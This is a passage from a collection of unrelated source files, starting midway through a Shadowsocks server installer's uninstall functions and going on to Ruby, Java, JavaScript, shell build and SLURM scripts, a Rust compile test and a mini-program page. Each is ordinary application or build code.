# script, then delete config, init script, logs and /usr/local/shadowsocks.
# Fixes over the original: `read -r`, direct running-check instead of `$?`,
# and consistently quoted expansions.
uninstall_shadowsocks_r(){
printf "Are you sure uninstall ${red}${software[1]}${plain}? [y/n]\n"
read -r -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
# Stop the daemon only if it is currently running.
if ${shadowsocks_r_init} status > /dev/null 2>&1; then
${shadowsocks_r_init} stop
fi
local service_name
service_name=$(basename "${shadowsocks_r_init}")
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr "$(dirname "${shadowsocks_r_config}")"
rm -f "${shadowsocks_r_init}"
rm -f /var/log/shadowsocks.log
rm -fr /usr/local/shadowsocks
echo -e "[${green}Info${plain}] ${software[1]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[1]} uninstall cancelled, nothing to do..."
echo
fi
}
# Interactively uninstall Shadowsocks-Go: stop the daemon, deregister its init
# script, then delete config, init script and the server binary.
# Fixes over the original: `read -r`, direct running-check instead of `$?`,
# and consistently quoted expansions.
uninstall_shadowsocks_go(){
printf "Are you sure uninstall ${red}${software[2]}${plain}? [y/n]\n"
read -r -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
# Stop the daemon only if it is currently running.
if ${shadowsocks_go_init} status > /dev/null 2>&1; then
${shadowsocks_go_init} stop
fi
local service_name
service_name=$(basename "${shadowsocks_go_init}")
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr "$(dirname "${shadowsocks_go_config}")"
rm -f "${shadowsocks_go_init}"
rm -f /usr/bin/shadowsocks-server
echo -e "[${green}Info${plain}] ${software[2]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[2]} uninstall cancelled, nothing to do..."
echo
fi
}
# Interactively uninstall Shadowsocks-libev: stop the daemon, deregister its
# init script, then delete config and every installed binary/lib/man page.
# Fixes over the original: `read -r`, direct running-check instead of `$?`,
# quoted expansions, and the 19 repetitive `rm -f` lines folded into one
# loop over an explicit file list (same files, same order).
uninstall_shadowsocks_libev(){
printf "Are you sure uninstall ${red}${software[3]}${plain}? [y/n]\n"
read -r -p '(default: n):' answer
[ -z "${answer}" ] && answer='n'
if [ "${answer}" == 'y' ] || [ "${answer}" == 'Y' ]; then
# Stop the daemon only if it is currently running.
if ${shadowsocks_libev_init} status > /dev/null 2>&1; then
${shadowsocks_libev_init} stop
fi
local service_name
service_name=$(basename "${shadowsocks_libev_init}")
if check_sys packageManager yum; then
chkconfig --del "${service_name}"
elif check_sys packageManager apt; then
update-rc.d -f "${service_name}" remove
fi
rm -fr "$(dirname "${shadowsocks_libev_config}")"
# Everything `make install` placed under /usr/local, plus the simple-obfs
# plugin binaries built alongside it.
local f
for f in \
/usr/local/bin/ss-local \
/usr/local/bin/ss-tunnel \
/usr/local/bin/ss-server \
/usr/local/bin/ss-manager \
/usr/local/bin/ss-redir \
/usr/local/bin/ss-nat \
/usr/local/bin/obfs-local \
/usr/local/bin/obfs-server \
/usr/local/lib/libshadowsocks-libev.a \
/usr/local/lib/libshadowsocks-libev.la \
/usr/local/include/shadowsocks.h \
/usr/local/lib/pkgconfig/shadowsocks-libev.pc \
/usr/local/share/man/man1/ss-local.1 \
/usr/local/share/man/man1/ss-tunnel.1 \
/usr/local/share/man/man1/ss-server.1 \
/usr/local/share/man/man1/ss-manager.1 \
/usr/local/share/man/man1/ss-redir.1 \
/usr/local/share/man/man1/ss-nat.1 \
/usr/local/share/man/man8/shadowsocks-libev.8; do
rm -f "$f"
done
rm -fr /usr/local/share/doc/shadowsocks-libev
rm -f "${shadowsocks_libev_init}"
echo -e "[${green}Info${plain}] ${software[3]} uninstall success"
else
echo
echo -e "[${green}Info${plain}] ${software[3]} uninstall cancelled, nothing to do..."
echo
fi
}
# Prompt for which installed flavour to uninstall (1-4), verify its init
# script exists, and dispatch to the matching uninstall_* function.
# Fixes over the original: `read -r`, quoted `[ -f ... ]` targets, and the
# four copy-pasted if/elif branches replaced by one table-driven check
# (messages and exit behaviour unchanged).
uninstall_shadowsocks(){
while true
do
echo 'Which Shadowsocks server you want to uninstall?'
for ((i=1;i<=${#software[@]};i++ )); do
hint="${software[$i-1]}"
echo -e "${green}${i}${plain}) ${hint}"
done
read -r -p 'Please enter a number [1-4]:' un_select
case "${un_select}" in
1|2|3|4)
echo
echo "You choose = ${software[${un_select}-1]}"
echo
break
;;
*)
echo -e "[${red}Error${plain}] Please only enter a number [1-4]"
;;
esac
done
# Map the validated selection onto its init-script path and uninstaller.
local init_script='' uninstall_func=''
case "${un_select}" in
1) init_script="${shadowsocks_python_init}"; uninstall_func=uninstall_shadowsocks_python ;;
2) init_script="${shadowsocks_r_init}"; uninstall_func=uninstall_shadowsocks_r ;;
3) init_script="${shadowsocks_go_init}"; uninstall_func=uninstall_shadowsocks_go ;;
4) init_script="${shadowsocks_libev_init}"; uninstall_func=uninstall_shadowsocks_libev ;;
esac
# Only uninstall a flavour whose init script is actually present.
if [ -f "${init_script}" ]; then
${uninstall_func}
else
echo -e "[${red}Error${plain}] ${software[${un_select}-1]} not installed, please check it and try again."
echo
exit 1
fi
}
# Initialization step
# Entry point: dispatch on the first CLI argument, defaulting to "install".
action=$1
[ -z "$1" ] && action=install
case "${action}" in
install|uninstall)
# Expands to install_shadowsocks or uninstall_shadowsocks.
${action}_shadowsocks
;;
*)
echo "Arguments error! [${action}]"
echo "Usage: $(basename "$0") [install|uninstall]"
;;
esac
<gh_stars>0
module ProviderInterface
  # Renders a coloured status tag for an application choice as seen by a
  # provider user.
  class ApplicationStatusTagComponent < ViewComponent::Base
    # Tag colour for every status the component knows about. Statuses mapped
    # to nil ('unsubmitted', 'cancelled', 'application_not_sent') are never
    # visible to the provider, so they deliberately carry no colour.
    TAG_COLOURS = {
      'unsubmitted' => nil,
      'cancelled' => nil,
      'application_not_sent' => nil,
      'awaiting_provider_decision' => :purple,
      'interviewing' => :yellow,
      'offer' => :turquoise,
      'pending_conditions' => :blue,
      'recruited' => :green,
      'rejected' => :orange,
      'conditions_not_met' => :orange,
      'offer_withdrawn' => :orange,
      'declined' => :red,
      'withdrawn' => :red,
      'offer_deferred' => :yellow,
    }.freeze

    delegate :status, to: :application_choice

    def initialize(application_choice:)
      @application_choice = application_choice
    end

    # Localised, human-readable label for the current status.
    def text
      I18n.t!("provider_application_states.#{status}")
    end

    # Colour symbol for the tag; raises for any status nobody has mapped yet
    # so new states cannot silently render uncoloured.
    def type
      raise "You need to define a colour for the #{status} state" unless TAG_COLOURS.key?(status)

      TAG_COLOURS.fetch(status)
    end

    private

    attr_reader :application_choice
  end
end
|
<reponame>zonesgame/StendhalArcClient<gh_stars>1-10
/***************************************************************************
* (C) Copyright 2003-2016 - Marauroa *
***************************************************************************
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
package marauroa.common.net.message;
import java.io.IOException;
import marauroa.common.net.Channel;
import marauroa.common.net.InputSerializer;
/**
* This message indicate the client that the server has rejected its Logout
* Message
*
* @see marauroa.common.net.message.Message
*/
public class MessageS2CLogoutNACK extends Message {
/** Constructor for allowing creation of an empty message */
public MessageS2CLogoutNACK() {
// No source channel: this instance exists only to be deserialized into.
super(MessageType.S2C_LOGOUT_NACK, null);
}
/**
 * Constructor with a TCP/IP source/destination of the message
 *
 * @param source
 *            The TCP/IP address associated to this message
 */
public MessageS2CLogoutNACK(Channel source) {
super(MessageType.S2C_LOGOUT_NACK, source);
}
/**
 * This method returns a String that represent the object
 *
 * @return a string representing the object.
 */
@Override
public String toString() {
return "Message (S2C Logout NACK) from (" + getAddress() + ") CONTENTS: ()";
}
@Override
public void readObject(InputSerializer in) throws IOException {
super.readObject(in);
// Defensive check: reject a payload whose deserialized type byte does
// not match this message class.
if (type != MessageType.S2C_LOGOUT_NACK) {
throw new IOException();
}
}
}
|
/* Fallback definitions so Interface Builder annotations compile when the
 * Apple headers that normally define them are not included. IBOutlet is a
 * pure marker and expands to nothing; IBAction methods return void. */
#ifndef IBOutlet
#define IBOutlet
#endif
#ifndef IBAction
#define IBAction void
#endif
|
<filename>public/plugins/reportbro/src/commands/SetValueCmd.js
import Command from './Command';
import DocElement from '../elements/DocElement';
/**
* Command to set a single value of a data object.
* @class
*/
export default class SetValueCmd {
    /**
     * @param {Number} objId - id of the data object whose field is changed.
     * @param {String} tagId - DOM id of the input element showing the field.
     * @param {String} field - name of the field to set.
     * @param value - new value for the field.
     * @param {String} type - one of SetValueCmd.type, selects how the DOM
     * element is refreshed when the object is currently shown.
     * @param rb - ReportBro instance (object registry + event bus).
     */
    constructor(objId, tagId, field, value, type, rb) {
        this.objId = objId;
        this.tagId = tagId;
        this.field = field;
        this.value = value;
        this.type = type;
        this.rb = rb;
        let obj = rb.getDataObject(objId);
        // Captured now so undo() can restore the pre-command state.
        this.oldValue = obj.getValue(field);
        this.firstExecution = true;
        this.select = true;
    }

    getName() {
        return 'Set value';
    }

    do() {
        // On redo (not the first run) re-select the object so the user sees
        // where the change happens; the first run happens while it is
        // already selected.
        if (!this.firstExecution && this.select) {
            this.rb.selectObject(this.objId, true);
        }
        this.setValue(this.value);
        this.firstExecution = false;
    }

    undo() {
        if (this.select) {
            this.rb.selectObject(this.objId, true);
        }
        this.setValue(this.oldValue);
    }

    /**
     * Writes the value into the data object, fires change/rename events and,
     * when the object's detail panel is visible, mirrors the value into the
     * matching DOM control according to this.type.
     */
    setValue(value) {
        let obj = this.rb.getDataObject(this.objId);
        let detailData = this.rb.getDetailData();
        let isShown = (detailData !== null && detailData.getId() === this.objId);
        let elSelector = `#${this.tagId}`;
        obj.setValue(this.field, value, elSelector, isShown);

        if (obj instanceof DocElement) {
            // DocElements may normalize the value (e.g. rounding) for display.
            value = obj.getUpdateValue(this.field, value);
        }

        if (this.field === 'name') {
            // Renames also update the object's entry in the menu panel.
            $(`#rbro_menu_item_name${this.objId}`).text(value);
            $(`#rbro_menu_item_name${this.objId}`).attr('title', value);
            this.rb.notifyEvent(obj, Command.operation.rename);
        } else {
            this.rb.notifyEvent(obj, Command.operation.change, this.field);
        }
        if (isShown) {
            if (this.type === SetValueCmd.type.text || this.type === SetValueCmd.type.select) {
                $(elSelector).val(value);
            } else if (this.type === SetValueCmd.type.filename) {
                $(elSelector).text(value);
                // Hide the filename row entirely when no file is set.
                if (value === '') {
                    $(`#${this.tagId}_container`).addClass('rbroHidden');
                } else {
                    $(`#${this.tagId}_container`).removeClass('rbroHidden');
                }
            } else if (this.type === SetValueCmd.type.checkbox) {
                $(elSelector).prop('checked', value);
            } else if (this.type === SetValueCmd.type.button) {
                if (value) {
                    $(elSelector).addClass('rbroButtonActive');
                } else {
                    $(elSelector).removeClass('rbroButtonActive');
                }
            } else if (this.type === SetValueCmd.type.buttonGroup) {
                // Exactly one button in the group may be active.
                $(elSelector).find('button').removeClass('rbroButtonActive');
                $(elSelector).find(`button[value="${value}"]`).addClass('rbroButtonActive');
            } else if (this.type === SetValueCmd.type.color) {
                $(elSelector).spectrum("set", value);
            }
        }
    }

    /**
     * Disables selection of the element containing the changed field. By default an element is automatically
     * selected after one of its fields was changed.
     */
    disableSelect() {
        this.select = false;
    }

    /**
     * Returns true if the given command targets the same field. This information can be useful to avoid separate
     * commands for every keystroke in a text field and generate just one command for the whole changed text instead.
     * @param {SetValueCmd} newCmd
     * @returns {boolean}
     */
    allowReplace(newCmd) {
        return (this.type === SetValueCmd.type.text && this.objId === newCmd.objId &&
            this.tagId === newCmd.tagId && this.field === newCmd.field);
    }
}
// Enumerates the UI control kinds SetValueCmd.setValue knows how to refresh.
SetValueCmd.type = {
    text: 'text',
    select: 'select',
    file: 'file',
    filename: 'filename',
    checkbox: 'checkbox',
    button: 'button',
    buttonGroup: 'buttonGroup', // one button inside a group of buttons with only one active button
    color: 'color',
    internal: 'internal' // value change with no DOM element to update
};
|
1. Design a REST API endpoint to generate a personalized greeting message.
2. Take the user name as an input parameter.
3. Construct an algorithm to generate the greeting message.
4. Format the output with appropriate grammatical rules and punctuation.
5. Validate the input and output types of the API. |
#!/bin/sh
set -e
# Reattach to an existing "blog" tmux session rather than creating a second.
if tmux has-session -t blog 2> /dev/null; then
tmux attach -t blog
exit
fi
# Fresh session: an "editor" window running the editor, plus a narrow (10%)
# side pane from the horizontal split.
tmux new-session -d -s blog -n editor
tmux send-keys -t blog:editor "v " Enter
tmux split-window -t blog:editor -h -p 10
# NOTE(review): ".top" assumes a pane addressed "top", but -h splits create
# left/right panes — confirm this target resolves as intended.
tmux attach -t blog:editor.top
|
# Termux build recipe metadata for the dovecot mail server package.
TERMUX_PKG_HOMEPAGE=https://www.dovecot.org
TERMUX_PKG_DESCRIPTION="Secure IMAP and POP3 email server"
TERMUX_PKG_VERSION=2.2.31
TERMUX_PKG_SRCURL=https://www.dovecot.org/releases/2.2/dovecot-$TERMUX_PKG_VERSION.tar.gz
TERMUX_PKG_SHA256=034be40907748128d65088a4f59789b2f99ae7b33a88974eae0b6a68ece376a1
TERMUX_PKG_MAINTAINER="Vishal Biswas @vishalbiswas"
TERMUX_PKG_DEPENDS="openssl, libcrypt"
# turning on icu gives undefined reference to __cxa_call_unexpected
# The i_cv_*/lib_cv_* entries preset autoconf cache values that configure
# cannot probe by running test programs when cross-compiling for Android.
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
--with-zlib
--with-ssl=openssl
--with-ssldir=$TERMUX_PREFIX/etc/tls
--without-icu
--without-shadow
i_cv_epoll_works=yes
i_cv_posix_fallocate_works=yes
i_cv_signed_size_t=no
i_cv_gmtime_max_time_t=40
i_cv_signed_time_t=yes
i_cv_mmap_plays_with_write=yes
i_cv_fd_passing=yes
i_cv_c99_vsnprintf=yes
lib_cv_va_copy=yes
lib_cv___va_copy=yes
"
# Pre-configure tweaks: link against Android's liblog, rename dovecot's
# 'struct user' in the director sources (presumably to avoid a name clash on
# Android — TODO confirm), and preset the per-arch va_list copy probe.
termux_step_pre_configure () {
LDFLAGS="$LDFLAGS -llog"
# find -exec is immune to word-splitting of file names, unlike the
# original `for i in $(find ...)` loop.
find "$TERMUX_PKG_SRCDIR/src/director" -type f -exec sed 's|\bstruct user\b|struct usertest|g' -i {} +
# Leading space guarantees the appended cache value stays a separate word
# instead of relying on the existing string's trailing newline.
if [ "$TERMUX_ARCH" == "aarch64" ]; then
TERMUX_PKG_EXTRA_CONFIGURE_ARGS+=" lib_cv_va_val_copy=yes"
else
TERMUX_PKG_EXTRA_CONFIGURE_ARGS+=" lib_cv_va_val_copy=no"
fi
}
# Move doveadm/doveconf into libexec and replace them with wrapper scripts
# that put dovecot's private libdir on LD_LIBRARY_PATH before exec'ing the
# real binary.
termux_step_post_make_install () {
for binary in doveadm doveconf; do
mv $TERMUX_PREFIX/bin/$binary $TERMUX_PREFIX/libexec/dovecot/$binary
# The heredoc delimiter is unquoted so $TERMUX_PREFIX expands at build
# time; runtime variables must be backslash-escaped (as LD_LIBRARY_PATH
# already is). The original emitted an unescaped $@, which expanded at
# build time (to nothing) instead of forwarding the wrapper's own
# arguments — "\$@" makes the generated wrapper pass them through.
cat > $TERMUX_PREFIX/bin/$binary <<HERE
#!$TERMUX_PREFIX/bin/sh
export LD_LIBRARY_PATH=$TERMUX_PREFIX/lib/dovecot:\$LD_LIBRARY_PATH
exec $TERMUX_PREFIX/libexec/dovecot/$binary "\$@"
HERE
chmod u+x $TERMUX_PREFIX/bin/$binary
done
}
|
package com.vmware.spring.workshop.facade.support.impl;
import java.beans.IntrospectionException;
import org.springframework.stereotype.Component;
import com.vmware.spring.workshop.dto.user.UserDTO;
import com.vmware.spring.workshop.facade.support.UserDTOImportExport;
/**
* @author lgoldstein
*/
@Component("userDTOImportExport")
public class UserDTOImportExportImpl
extends AbstractCSVImportExportImpl<UserDTO>
implements UserDTOImportExport {
// Binds the generic CSV import/export machinery to the UserDTO bean type;
// the superclass introspects UserDTO's properties and may throw if that
// bean introspection fails.
public UserDTOImportExportImpl () throws IntrospectionException {
super(UserDTO.class);
}
}
|
// Barrel file: re-export the AddPetPage component as this folder's default.
export { default } from "./AddPetPage";
|
#!/bin/bash
# SLURM batch job: render a movie from simulation snapshots on one
# 56-task development node (2 h wall time, allocation AST21002).
#SBATCH -J vis -p development -N 1 --ntasks-per-node 56 -t 2:00:00 -A AST21002
source $HOME/.bashrc
# 14 worker processes, 4 render threads each, 1920px frames; camera path
# comes from camerafile.txt and snapshots from the given output directory.
python ~/scripts/CrunchSnaps/scripts/make_movie_from_camerafile.py camerafile.txt ../../M2e4_R10_S0_T1_B0.01_Res271_n2_sol0.5_42/output --np=14 --np_render=4 --res=1920 --no_timestamp --fresco_stars
<gh_stars>1-10
module GoalsHelper
# Builds the one-line public description of a goal, e.g.
# "I'll run 1,000 miles in 2009. Currently 250".
# NOTE(review): "in 2009" is hard-coded — presumably stale; confirm whether
# the year should come from the goal or the current date.
def goal_text(goal)
"I'll #{goal.message} #{number_with_delimiter(goal.number)} #{goal.message2} in 2009. Currently #{goal.current}"
end
end
|
#!/bin/bash
# Compile an inline Rust program from stdin ("-") and emit its MIR at the
# highest MIR optimisation level; exercises a trait-bound mir-opt test case.
rustc --emit mir -Z mir-opt-level=3 - <<EOF
// build-pass
#![allow(dead_code)]
trait Foo {
fn foo(&self);
}
fn foo<'a>(s: &'a mut ()) where &'a mut (): Foo {
s.foo();
}
fn main() {}
EOF
|
// Base path of the Sentinl backend API; every endpoint below is relative to it.
const base = '../api/sentinl';

// REST endpoint URLs grouped by feature area.
export default {
  WATCHER_EDIT: {
    COUNT: `${base}/watcher/editor/count`,
    AVERAGE: `${base}/watcher/editor/average`,
    SUM: `${base}/watcher/editor/sum`,
    MIN: `${base}/watcher/editor/min`,
    MAX: `${base}/watcher/editor/max`,
  },
  ES: {
    ALL_INDEXES: `${base}/es/indexes`,
    GET_MAPPING: `${base}/es/getmapping`,
  },
};
|
var _Page;
function _defineProperty(t, e, o) {
return e in t ? Object.defineProperty(t, e, {
value: o,
enumerable: !0,
configurable: !0,
writable: !0
}) : t[e] = o, t;
}
var utils = require("../../../utils/helper.js");
// WeChat/Alipay mini-program page: group-buy ("pintuan") order detail.
// Built from a Babel _defineProperty transform, so some handlers are attached
// to _Page after the main object literal. All quoted Chinese strings are
// user-facing runtime text and must not be altered.
Page((_defineProperty(_Page = {
data: {
groupFail: 0,
show_attr_picker: !1,
form: {
number: 1
}
},
// Resolve the order id (oid) from a direct param, a scanned scene string,
// or (on Alipay, global `my`) a query stashed on the app; then load info.
onLoad: function(t) {
getApp().page.onLoad(this, t);
var e = t.user_id, o = decodeURIComponent(t.scene);
if (void 0 !== e) e; else if (void 0 !== o) {
var a = utils.scene_decode(o);
a.uid && a.oid ? (a.uid, t.oid = a.oid) : o;
} else if ("undefined" != typeof my && null !== getApp().query) {
var i = getApp().query;
getApp().query = null, t.oid = i.oid, i.uid;
}
this.setData({
oid: t.oid
}), this.getInfo(t);
},
onReady: function() {},
onShow: function() {},
onHide: function() {},
onUnload: function() {},
onPullDownRefresh: function() {},
onReachBottom: function() {},
// Share card: deep-link back to this group order tagged with the sharer's
// stored user id.
onShareAppMessage: function(t) {
getApp().page.onShareAppMessage(this);
var e = this, o = getApp().core.getStorageSync(getApp().const.USER_INFO), a = "/pages/pt/group/details?oid=" + e.data.oid + "&user_id=" + o.id;
return {
title: "快来" + e.data.goods.price + "元拼 " + e.data.goods.name,
path: a,
success: function(t) {}
};
},
// Fetch group-order details. On success seed page data (starting the
// countdown while the group is still open); on error show a modal that
// sends the user back to the group-buy index.
getInfo: function(t) {
var e = t.oid, o = this;
getApp().core.showLoading({
title: "正在加载",
mask: !0
}), getApp().request({
url: getApp().api.group.group_info,
method: "get",
data: {
oid: e
},
success: function(t) {
if (0 == t.code) {
0 == t.data.groupFail && o.countDownRun(t.data.limit_time_ms);
var e = (t.data.goods.original_price - t.data.goods.price).toFixed(2);
o.setData({
goods: t.data.goods,
groupList: t.data.groupList,
surplus: t.data.surplus,
limit_time_ms: t.data.limit_time_ms,
goods_list: t.data.goodsList,
group_fail: t.data.groupFail,
oid: t.data.oid,
in_group: t.data.inGroup,
attr_group_list: t.data.attr_group_list,
group_rule_id: t.data.groupRuleId,
reduce_price: e < 0 ? 0 : e,
group_id: t.data.goods.class_group
}), 0 != t.data.groupFail && t.data.inGroup && o.setData({
oid: !1,
group_id: !1
}), o.selectDefaultAttr();
} else getApp().core.showModal({
title: "提示",
content: t.msg,
showCancel: !1,
success: function(t) {
t.confirm && getApp().core.redirectTo({
url: "/pages/pt/index/index"
});
}
});
},
complete: function(t) {
setTimeout(function() {
getApp().core.hideLoading();
}, 1e3);
}
});
},
// Pre-select the first attribute of the first group when the goods has no
// user-selectable attributes configured.
selectDefaultAttr: function() {
var t = this;
if (!t.data.goods || 0 === t.data.goods.use_attr) for (var e in t.data.attr_group_list) for (var o in t.data.attr_group_list[e].attr_list) 0 == e && 0 == o && (t.data.attr_group_list[e].attr_list[o].checked = !0);
t.setData({
attr_group_list: t.data.attr_group_list
});
},
// Tick once a second until the deadline r = [year, month, day, h, m, s],
// publishing zero-padded days/hours/mins/secs to the view.
countDownRun: function(r) {
var s = this;
setInterval(function() {
var t = new Date(r[0], r[1] - 1, r[2], r[3], r[4], r[5]) - new Date(), e = parseInt(t / 1e3 / 60 / 60 / 24, 10), o = parseInt(t / 1e3 / 60 / 60 % 24, 10), a = parseInt(t / 1e3 / 60 % 60, 10), i = parseInt(t / 1e3 % 60, 10);
e = s.checkTime(e), o = s.checkTime(o), a = s.checkTime(a), i = s.checkTime(i),
s.setData({
limit_time: {
days: e,
hours: o,
mins: a,
secs: i
}
});
}, 1e3);
},
// Clamp negatives to 0 and left-pad single digits ("9" -> "09").
checkTime: function(t) {
return (t = 0 < t ? t : 0) < 10 && (t = "0" + t), t;
},
goToHome: function() {
getApp().core.redirectTo({
url: "/pages/pt/index/index"
});
},
goToGoodsDetails: function(t) {
getApp().core.redirectTo({
url: "/pages/pt/details/details?gid=" + this.data.goods.id
});
},
hideAttrPicker: function() {
this.setData({
show_attr_picker: !1
});
},
showAttrPicker: function() {
this.setData({
show_attr_picker: !0
});
},
// Single-choice toggle of the tapped attribute within its group; once every
// group has a checked attribute, refetch price/stock/picture for the
// selected combination.
attrClick: function(t) {
var o = this, e = t.target.dataset.groupId, a = t.target.dataset.id, i = o.data.attr_group_list;
for (var r in i) if (i[r].attr_group_id == e) for (var s in i[r].attr_list) i[r].attr_list[s].attr_id == a ? i[r].attr_list[s].checked = !0 : i[r].attr_list[s].checked = !1;
o.setData({
attr_group_list: i
});
var d = [], n = !0;
for (var r in i) {
var c = !1;
for (var s in i[r].attr_list) if (i[r].attr_list[s].checked) {
d.push(i[r].attr_list[s].attr_id), c = !0;
break;
}
if (!c) {
n = !1;
break;
}
}
n && (getApp().core.showLoading({
title: "正在加载",
mask: !0
}), getApp().request({
url: getApp().api.group.goods_attr_info,
data: {
goods_id: o.data.goods.id,
group_id: o.data.goods.class_group,
attr_list: JSON.stringify(d)
},
success: function(t) {
if (getApp().core.hideLoading(), 0 == t.code) {
var e = o.data.goods;
e.price = t.data.price, e.num = t.data.num, e.attr_pic = t.data.pic, o.setData({
goods: e
});
}
}
}));
},
buyNow: function() {
this.submit("GROUP_BUY_C");
},
// Validate picker visibility, stock and per-group attribute selection, then
// hand goods/attrs/quantity off to the order-submit page.
submit: function(t) {
var e = this;
if (!e.data.show_attr_picker) return e.setData({
show_attr_picker: !0
}), !0;
if (e.data.form.number > e.data.goods.num) return getApp().core.showToast({
title: "商品库存不足,请选择其它规格或数量",
image: "/images/icon-warning.png"
}), !0;
var o = e.data.attr_group_list, a = [];
for (var i in o) {
var r = !1;
for (var s in o[i].attr_list) if (o[i].attr_list[s].checked) {
r = {
attr_id: o[i].attr_list[s].attr_id,
attr_name: o[i].attr_list[s].attr_name
};
break;
}
if (!r) return getApp().core.showToast({
title: "请选择" + o[i].attr_group_name,
image: "/images/icon-warning.png"
}), !0;
a.push({
attr_group_id: o[i].attr_group_id,
attr_group_name: o[i].attr_group_name,
attr_id: r.attr_id,
attr_name: r.attr_name
});
}
e.setData({
show_attr_picker: !1
}), getApp().core.redirectTo({
url: "/pages/pt/order-submit/order-submit?goods_info=" + JSON.stringify({
goods_id: e.data.goods.id,
attr: a,
num: e.data.form.number,
type: t,
parent_id: e.data.oid,
deliver_type: e.data.goods.type,
group_id: e.data.goods.class_group
})
});
},
// Quantity stepper: decrement, never below 1.
numberSub: function() {
var t = this.data.form.number;
if (t <= 1) return !0;
t--, this.setData({
form: {
number: t
}
});
},
// Quantity stepper: increment, capped at one_buy_limit when non-zero.
numberAdd: function() {
var t = this, e = t.data.form.number;
++e > t.data.goods.one_buy_limit && 0 != t.data.goods.one_buy_limit ? getApp().core.showModal({
title: "提示",
content: "最多只允许购买" + t.data.goods.one_buy_limit,
showCancel: !1
}) : t.setData({
form: {
number: e
}
});
},
// Sanitise manual quantity input on blur: integer, >= 1, warn when above
// the per-order buy limit.
numberBlur: function(t) {
var e = this, o = t.detail.value;
if (o = parseInt(o), isNaN(o) && (o = 1), o <= 0 && (o = 1), o > e.data.goods.one_buy_limit && 0 != e.data.goods.one_buy_limit) return getApp().core.showModal({
title: "提示",
content: "最多只允许购买" + e.data.goods.one_buy_limit + "件",
showCancel: !1
}), void e.setData({
form: {
number: o
}
});
e.setData({
form: {
number: o
}
});
},
// Open the group-buy rules article, when one is configured.
goArticle: function(t) {
this.data.group_rule_id && getApp().core.navigateTo({
url: "/pages/article-detail/article-detail?id=" + this.data.group_rule_id
});
},
showShareModal: function(t) {
this.setData({
share_modal_active: "active",
no_scroll: !0
});
},
shareModalClose: function() {
this.setData({
share_modal_active: "",
no_scroll: !1
});
},
// Show (and lazily fetch) the shareable goods QR poster for this order.
getGoodsQrcode: function() {
var e = this;
if (e.setData({
goods_qrcode_active: "active",
share_modal_active: ""
}), e.data.goods_qrcode) return !0;
getApp().request({
url: getApp().api.group.order.goods_qrcode,
data: {
order_id: e.data.oid
},
success: function(t) {
0 == t.code && e.setData({
goods_qrcode: t.data.pic_url
}), 1 == t.code && (e.goodsQrcodeClose(), getApp().core.showModal({
title: "提示",
content: t.msg,
showCancel: !1,
success: function(t) {
t.confirm;
}
}));
}
});
},
goodsQrcodeClose: function() {
this.setData({
goods_qrcode_active: "",
no_scroll: !1
});
}
// NOTE(review): the transform re-defines goodsQrcodeClose below with an
// identical body — redundant but harmless.
}, "goodsQrcodeClose", function() {
this.setData({
goods_qrcode_active: "",
no_scroll: !1
});
}), _defineProperty(_Page, "saveGoodsQrcode", function() {
// Download the poster and save it into the user's photo album, with modal
// feedback for success/failure and a fallback notice on old clients that
// lack saveImageToPhotosAlbum.
var e = this;
getApp().core.saveImageToPhotosAlbum ? (getApp().core.showLoading({
title: "正在保存图片",
mask: !1
}), getApp().core.downloadFile({
url: e.data.goods_qrcode,
success: function(t) {
getApp().core.showLoading({
title: "正在保存图片",
mask: !1
}), getApp().core.saveImageToPhotosAlbum({
filePath: t.tempFilePath,
success: function() {
getApp().core.showModal({
title: "提示",
content: "商品海报保存成功",
showCancel: !1
});
},
fail: function(t) {
getApp().core.showModal({
title: "图片保存失败",
content: t.errMsg,
showCancel: !1
});
},
complete: function(t) {
getApp().core.hideLoading();
}
});
},
fail: function(t) {
getApp().core.showModal({
title: "图片下载失败",
content: t.errMsg + ";" + e.data.goods_qrcode,
showCancel: !1
});
},
complete: function(t) {
getApp().core.hideLoading();
}
})) : getApp().core.showModal({
title: "提示",
content: "当前版本过低,无法使用该功能,请升级到最新版本后重试。",
showCancel: !1
});
}), _defineProperty(_Page, "goodsQrcodeClick", function(t) {
// Full-screen preview of the tapped QR/poster image.
var e = t.currentTarget.dataset.src;
getApp().core.previewImage({
urls: [ e ]
});
}), _Page));
#!/bin/bash
# Reformat every ReScript source file in place with the compiler's formatter.
set -v -e
# bsc -format writes to stdout, so round-trip through a temporary file.
for i in src/*.res* __tests__/*.res; do
./node_modules/.bin/bsc -format $i > $i.out
mv $i.out $i
done
|
<reponame>zolboo-gtn/stackoverflow_demo
import { Prisma, Role } from "@prisma/client";
import { IsEmail, IsNotEmpty, Matches } from "class-validator";
/**
 * Payload for creating a user. The class-validator decorators are enforced
 * when this DTO passes through the framework's validation pipe.
 */
export class CreateUserDto
implements Pick<Prisma.UserCreateInput, "email" | "name" | "role">
{
/** Must be a syntactically valid e-mail address. */
@IsEmail()
readonly email: string;
readonly name?: string;
readonly role: Role;
/**
 * 8-16 characters containing at least one digit, one lowercase and one
 * uppercase letter; violations report "InvalidPasswordFormat".
 */
@IsNotEmpty()
@Matches(/^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,16}$/, {
message: "InvalidPasswordFormat",
})
readonly password: string;
}
|
package com.datafari.ranking.configuration;
import java.io.IOException;
import javax.inject.Inject;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.PropertySource;
import org.springframework.context.support.PropertySourcesPlaceholderConfigurer;
import com.datafari.ranking.training.ISolrClientProvider;
import com.datafari.ranking.training.ISparkContextProvider;
import com.datafari.ranking.training.SolrClientProviderImpl;
import com.datafari.ranking.training.SparkContextProviderImpl;
@Configuration
